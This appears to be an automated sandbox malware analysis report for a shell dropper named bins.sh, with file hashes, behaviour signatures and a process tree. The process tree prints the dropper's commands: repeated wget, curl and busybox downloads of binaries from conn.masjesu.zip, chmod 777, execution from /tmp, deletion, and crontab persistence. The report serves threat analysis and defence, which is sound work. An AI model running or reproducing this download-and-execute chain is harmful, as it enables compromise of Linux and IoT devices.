Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27-10-2024 14:47
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
5ad9fce74e2c2c2bc17e1c3c7c1e9699
-
SHA1
f6a06bb0801544767f9542e687c8970f4da13169
-
SHA256
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda
-
SHA512
70e49474c5684e1b77cc2e47abe567e6d5e8b0f7edfca79a7feefe0ae389462b6747c2841c31acb7168e04c121a563d887515cbdb75530dca80da2ade3b95d16
-
SSDEEP
192:MAM8A8b2OyaeCz0sbcqmss0xFw/3xe3rhxFw/3Vfqmsl3rD3A8b2OneCz0sT:MA0aeCz0sbcqmss0xFw/3oxFw/31qmsJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 795 chmod 810 chmod 910 chmod 936 chmod 719 chmod 862 chmod 922 chmod 711 chmod 772 chmod 782 chmod 761 chmod 852 chmod 930 chmod 740 chmod 889 chmod 898 chmod 789 chmod 749 chmod 801 chmod 830 chmod 841 chmod 677 chmod 819 chmod 870 chmod 880 chmod 904 chmod 916 chmod 728 chmod -
Executes dropped EXE 3 IoCs
Processes:
r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsBTTdQXSsS6OZC3chipRm15yMjiW7QXSMnhnr3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsBioc pid process /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB 678 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 843 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB 891 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB -
Renames itself 1 IoCs
Processes:
r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsBpid process 679 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.n8CLFG crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 4 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsBcurlcurlcrontabcrontabcurldescription ioc process File opened for reading /proc/25/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/723/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/748/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/865/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/874/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/18/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/953/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/688/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/710/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/837/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/845/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/928/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/2/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/13/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/738/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/757/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/806/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/22/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/636/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/804/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/863/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/737/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/799/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/803/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/816/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/701/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/857/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/4/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/9/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/14/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/703/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/936/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/146/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/265/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/410/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/724/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/745/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/951/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/filesystems crontab File opened for reading /proc/24/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/777/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/833/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/908/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/280/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/896/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/947/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/filesystems crontab File opened for reading /proc/212/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/760/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/792/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/812/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/704/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/767/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/902/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/299/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/755/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/787/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/798/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/818/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/871/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/746/cmdline r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
curlcurlrmcurlcurlwgetbusyboxwgetcurlwgetbusyboxbusyboxbusyboxbusyboxcurlcurlwgetbusyboxcurlwgetwgetwgetwgetwgetwgetcurlbusyboxwgetcurlbusyboxwgetcurlwgetbusyboxTTdQXSsS6OZC3chipRm15yMjiW7QXSMnhnbusyboxbusyboxbusyboxcurlbusyboxcurlrmwgetbusyboxcurlwgetcurlbusyboxcurlcurlwgetwgetcurlbusyboxbusyboxwgetwgetcurlcurlwgetbusyboxbusyboxwgetcurlpid process 660 curl 725 curl 812 rm 914 curl 934 curl 690 wget 758 busybox 785 wget 876 curl 893 wget 897 busybox 915 busybox 727 busybox 769 busybox 779 curl 799 curl 804 wget 903 busybox 908 curl 925 wget 835 wget 874 wget 913 wget 654 wget 743 wget 805 curl 887 busybox 901 wget 691 curl 909 busybox 919 wget 920 curl 933 wget 828 busybox 843 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 851 busybox 929 busybox 800 busybox 848 curl 806 busybox 825 curl 845 rm 856 wget 921 busybox 716 curl 798 wget 836 curl 878 busybox 926 curl 745 curl 755 wget 847 wget 768 curl 781 busybox 838 busybox 884 wget 733 wget 736 curl 756 curl 823 wget 693 busybox 718 busybox 723 wget 787 curl -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlbusyboxdescription ioc process File opened for modification /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB curl File opened for modification /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:644
-
/bin/rm/bin/rm bins.sh2⤵PID:652
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:654 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:660 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:674
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:677 -
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:678 -
/bin/shsh -c "crontab -l"3⤵PID:680
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:681 -
/bin/shsh -c "crontab -"3⤵PID:683
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:684 -
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:686
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:690 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:691 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:693 -
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:711 -
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:712
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:713
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:715
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:716 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:718 -
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:719 -
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:721
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:722
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:723 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:725 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:727 -
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:728 -
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:730
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:731
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:733 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:736 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:738
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:740 -
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:741
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:742
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:743 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:745 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:747
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:749 -
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:752
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:753
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:755 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:756 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:758 -
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:761 -
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:764
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:765
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:766
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:768 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:769 -
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:772 -
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:774
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:776
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:778
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:779 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:781 -
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:782 -
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:783
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:784
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:785 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:787 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:788
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:789 -
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:790
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:791
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:792
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:793
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:794
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:795 -
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:796
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:797
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:798 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:799 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:800 -
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:801 -
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:802
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:803
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:804 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:805 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:806 -
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:810 -
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵PID:811
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:812 -
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:813
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:815
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:817
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:819 -
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:820
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:821
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:823 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:825 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:828 -
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:830 -
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:832
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:833
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:835 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:836 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:838 -
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:841 -
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:843 -
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:845 -
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:847 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:848 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:851 -
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:852 -
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:853
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:855
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:856 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:858
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:860
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:862 -
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:863
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:864
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:865
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:867
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:869
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:870 -
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:872
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:873
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:874 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:876 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:878 -
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:880 -
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:881
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:882
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:884 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:886
-
